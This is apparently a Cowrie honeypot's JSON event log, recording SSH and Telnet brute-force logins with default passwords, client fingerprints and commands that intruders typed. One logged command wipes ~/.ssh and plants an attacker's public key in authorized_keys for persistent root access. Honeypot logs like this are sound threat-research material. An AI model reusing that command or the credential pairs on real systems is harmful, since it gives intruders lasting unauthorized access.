{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:33.995308Z","src_ip":"212.227.235.229","session":"49f51ec02375"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:35.324203Z","src_ip":"212.227.235.229","session":"49f51ec02375"}
{"eventid":"cowrie.session.closed","duration":5.911182403564453,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:35.478177Z","src_ip":"212.227.125.160","session":"bcc3dd76bfa6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38832,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b8ddd08fc2d","protocol":"telnet","message":"New connection: 212.227.125.160:38832 (1.2.3.4:23) [session: 4b8ddd08fc2d]","sensor":"my-vps","timestamp":"2025-08-31T06:34:35.573040Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3705,"dst_ip":"1.2.3.4","dst_port":23,"session":"212ef7ce2052","protocol":"telnet","message":"New connection: 212.227.125.160:3705 (1.2.3.4:23) [session: 212ef7ce2052]","sensor":"my-vps","timestamp":"2025-08-31T06:34:35.798038Z"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco","message":"login attempt [cisco/cisco] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:35.805037Z","src_ip":"212.227.125.160","session":"4b8ddd08fc2d"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:36.648700Z","src_ip":"212.227.235.229","session":"49f51ec02375"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"12345","message":"login attempt [ubuntu/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:36.862574Z","src_ip":"212.227.235.229","session":"23737c875475"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42476,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba86b49483c3","protocol":"ssh","message":"New connection: 212.227.235.229:42476 (1.2.3.4:22) [session: ba86b49483c3]","sensor":"my-vps","timestamp":"2025-08-31T06:34:36.887211Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59960,"dst_ip":"1.2.3.4","dst_port":22,"session":"453312386344","protocol":"ssh","message":"New connection: 212.227.235.229:59960 (1.2.3.4:22) [session: 453312386344]","sensor":"my-vps","timestamp":"2025-08-31T06:34:36.970139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:36.971092Z","src_ip":"212.227.235.229","session":"453312386344"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:37.294050Z","src_ip":"212.227.235.229","session":"453312386344"}
{"eventid":"cowrie.session.closed","duration":2.2707462310791016,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:37.843715Z","src_ip":"212.227.125.160","session":"4b8ddd08fc2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38846,"dst_ip":"1.2.3.4","dst_port":23,"session":"3fa1a332127f","protocol":"telnet","message":"New connection: 212.227.125.160:38846 (1.2.3.4:23) [session: 3fa1a332127f]","sensor":"my-vps","timestamp":"2025-08-31T06:34:37.940901Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:38.623178Z","src_ip":"212.227.235.229","session":"453312386344"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:38.751677Z","src_ip":"212.227.235.229","session":"23737c875475"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:38.927159Z","src_ip":"212.227.235.229","session":"589f345cdb25"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:38.953121Z","src_ip":"212.227.235.229","session":"453312386344"}
{"eventid":"cowrie.session.closed","duration":2.15226674079895,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:40.093097Z","src_ip":"212.227.125.160","session":"3fa1a332127f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38858,"dst_ip":"1.2.3.4","dst_port":23,"session":"3aad4fd24afc","protocol":"telnet","message":"New connection: 212.227.125.160:38858 (1.2.3.4:23) [session: 3aad4fd24afc]","sensor":"my-vps","timestamp":"2025-08-31T06:34:40.188389Z"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:40.974181Z","src_ip":"212.227.125.160","session":"3aad4fd24afc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:40.993674Z","src_ip":"212.227.125.160","session":"3aad4fd24afc"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T06:34:41.100383Z","src_ip":"212.227.125.160","session":"3aad4fd24afc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:41.951987Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:34:42.017032Z","src_ip":"212.227.235.229","session":"ba86b49483c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:42.129517Z","src_ip":"212.227.125.160","session":"3aad4fd24afc"}
{"eventid":"cowrie.session.closed","duration":1.9478800296783447,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:42.136340Z","src_ip":"212.227.125.160","session":"3aad4fd24afc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63250,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3e6acef1c2f","protocol":"ssh","message":"New connection: 212.227.235.229:63250 (1.2.3.4:22) [session: b3e6acef1c2f]","sensor":"my-vps","timestamp":"2025-08-31T06:34:43.252614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:43.255855Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:43.464593Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer1234","message":"login attempt [root/Qwer1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:44.305910Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:44.751511Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:34:44.753609Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:34:44.755035Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:44.965826Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:34:45.444589Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:34:45.445408Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:34:45.657579Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:45.658460Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":30789,"dst_ip":"1.2.3.4","dst_port":22,"session":"6daa559a9d36","protocol":"ssh","message":"New connection: 212.227.235.229:30789 (1.2.3.4:22) [session: 6daa559a9d36]","sensor":"my-vps","timestamp":"2025-08-31T06:34:45.871388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:45.875068Z","src_ip":"212.227.235.229","session":"6daa559a9d36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:46.089162Z","src_ip":"212.227.235.229","session":"6daa559a9d36"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:34:46.946934Z","src_ip":"212.227.235.229","session":"6daa559a9d36"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:48.164888Z","src_ip":"212.227.235.229","session":"6daa559a9d36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47862,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbcf80da0945","protocol":"ssh","message":"New connection: 212.227.235.229:47862 (1.2.3.4:22) [session: cbcf80da0945]","sensor":"my-vps","timestamp":"2025-08-31T06:34:48.378328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:34:48.380305Z","src_ip":"212.227.235.229","session":"cbcf80da0945"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:34:48.593570Z","src_ip":"212.227.235.229","session":"cbcf80da0945"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:48.821971Z","src_ip":"212.227.125.160","session":"1f483f71213d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:34:49.453733Z","src_ip":"212.227.235.229","session":"cbcf80da0945"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:49.672504Z","src_ip":"212.227.235.229","session":"b3e6acef1c2f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:34:49.673661Z","src_ip":"212.227.235.229","session":"cbcf80da0945"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50948,"dst_ip":"1.2.3.4","dst_port":22,"session":"e03ce46a2b17","protocol":"ssh","message":"New connection: 212.227.125.160:50948 (1.2.3.4:22) [session: e03ce46a2b17]","sensor":"my-vps","timestamp":"2025-08-31T06:34:51.073295Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34758,"dst_ip":"1.2.3.4","dst_port":22,"session":"2409532033e5","protocol":"ssh","message":"New connection: 212.227.125.160:34758 (1.2.3.4:22) [session: 2409532033e5]","sensor":"my-vps","timestamp":"2025-08-31T06:34:51.498485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:51.782837Z","src_ip":"212.227.125.160","session":"e03ce46a2b17"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:34:51.783504Z","src_ip":"212.227.125.160","session":"e03ce46a2b17"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:34:52.143346Z","src_ip":"212.227.125.160","session":"2409532033e5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com